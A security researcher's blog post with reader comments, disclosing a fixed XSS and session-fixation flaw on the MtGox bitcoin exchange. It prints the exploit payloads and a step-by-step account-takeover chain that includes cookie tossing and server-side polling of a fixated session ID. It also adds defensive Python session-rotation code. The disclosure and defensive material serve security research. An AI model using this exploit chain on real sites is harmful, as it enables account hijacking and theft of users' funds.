But it *is* MtGox. When I started checking bitcoin-related websites it was my target #1. The first XSS was found in 5 minutes on payments.mtgox.com; a few minutes later I discovered a session fixation leading to account takeover. Long story short, here's the exploit:
name='document.cookie="SESSION_ID=SID; Domain=.mtgox.com; Path=/code"';
location='https://payment.mtgox.com/38131846-a564-487c-abfb-6c5be47bce27/e6325160-7d49-4a69-b40f-42bb3d2f7b91?payment[cancel]=cancel';
1. Create a Checkout button at https://www.mtgox.com/merchant/checkout and set the Cancel URL to javascript:eval(name);
2. Put your payload in window.name and redirect to "https://payment.mtgox.com/38131846-a564-487c-abfb-6c5be47bce27/e6325160-7d49-4a69-b40f-42bb3d2f7b91?payment[cancel]=cancel" (a GET-accessible action). MtGox sends X-Frame-Options, so it won't work in an iframe.
3. The user is supposed to wait 5 seconds until the setTimeout in the page's JS assigns our javascript: URL to location.
4. Get a guest SID from your server side and fixate it using this XSS. This is called cookie tossing: our cookie shadows the original SESSION_ID because cookies with more specific Paths are sent first.
document.cookie="SESSION_ID=SID; Domain=.mtgox.com; Path=/code"
5. Close the window.
6. Someday the user logs in, and his session keeps the same SID. Your server script should run a cron task every 5 minutes, checking whether the SID is still a "guest" one. As soon as the user signs in you can use the fixated SID to perform any action on behalf of his account ("session riding").
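As an added example (mine, not code from the original post or from MtGox), here is the server-side session handling that breaks this chain at two points: a request carrying two SESSION_ID cookies (the tossed Path=/code one arrives first, per RFC 6265 ordering) or an ID the server never issued is not adopted, and the ID is rotated at login so a pre-login SID never becomes an authenticated one. The SessionStore class, its cookie name and its rules are assumptions for illustration.

```python
import secrets


def parse_cookie_header(header):
    """Return (name, value) pairs in the order the browser sent them.
    RFC 6265 section 5.4 lists cookies with longer Paths first, so a tossed
    'Path=/code' SESSION_ID precedes the site's original 'Path=/' one."""
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        name, value = part.split("=", 1)
        pairs.append((name.strip(), value.strip()))
    return pairs


class SessionStore:
    """Hypothetical server-side store; only server-generated IDs exist in it."""

    def __init__(self):
        self.sessions = {}  # sid -> {"user": None or username}

    def issue(self):
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def resolve(self, cookie_header):
        """Pick the session for a request (the caller must Set-Cookie the result).
        Assumed hardening: a duplicated SESSION_ID name or an ID this server
        never issued is discarded and a fresh guest session is started instead,
        so a client-supplied (fixated) value is never adopted."""
        ids = [v for n, v in parse_cookie_header(cookie_header) if n == "SESSION_ID"]
        if len(ids) != 1 or ids[0] not in self.sessions:
            return self.issue()
        return ids[0]

    def login(self, sid, username):
        """Rotate the ID at authentication: the pre-login SID is destroyed and
        the authenticated state lives only under a new, unpredictable ID."""
        self.sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self.sessions[new_sid] = {"user": username}
        return new_sid
```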
Timeline
Jan 11 - vuln reported
Jan 14 - vuln accepted and fixed in 3 hours.
FYI, use nils@tibanne.com as "security@mtgox.com" (MtGox has neither a bounty program nor an email address for reports).
Recap:
Even top-notch bitcoin websites are not as secure as payment providers should be. This vulnerability is really easy to find, so I suspect it has been used in the wild. Use 2-factor auth.
In no time the bitcoin currency gained real value, but the security level of bitcoin websites didn't keep pace.
Thank you for helping the community. I hope you got a reward/bounty?
He probably didn't :(
Might be worth putting a bitcoin address on this blog post and accepting donations - I bet more than a few people would throw you some beer money just as a thank you.
You can use the Dogecoin twitter bot to tip him @homakov. Convert BTC to DOGE and use the instructions here: https://twitter.com/tipdoge
Or just use tippercoin.com?
Was this due to the cookies not being set as HttpOnly on mtgox?
No, current cookies don't matter, I *replaced* them with my value = fixated
Hey Egor, good post. Maybe the main reason I go to Hacker News is to find blogs of experts who are also good writers, inventive and with some panache to add to my top shelf RSS pile. Yours is now among them. Keep it up please.
"Top notch" sites like Gox. Lol
top shelf sites, man, top tier
you don't get more top than the "Magic: The Gathering Online" eXchange
This mainly happened because of an XSS vulnerability that allowed you to execute scripts - also because MTGOX at that time allowed the session id to be fixated on the server side from the client side. Ain't?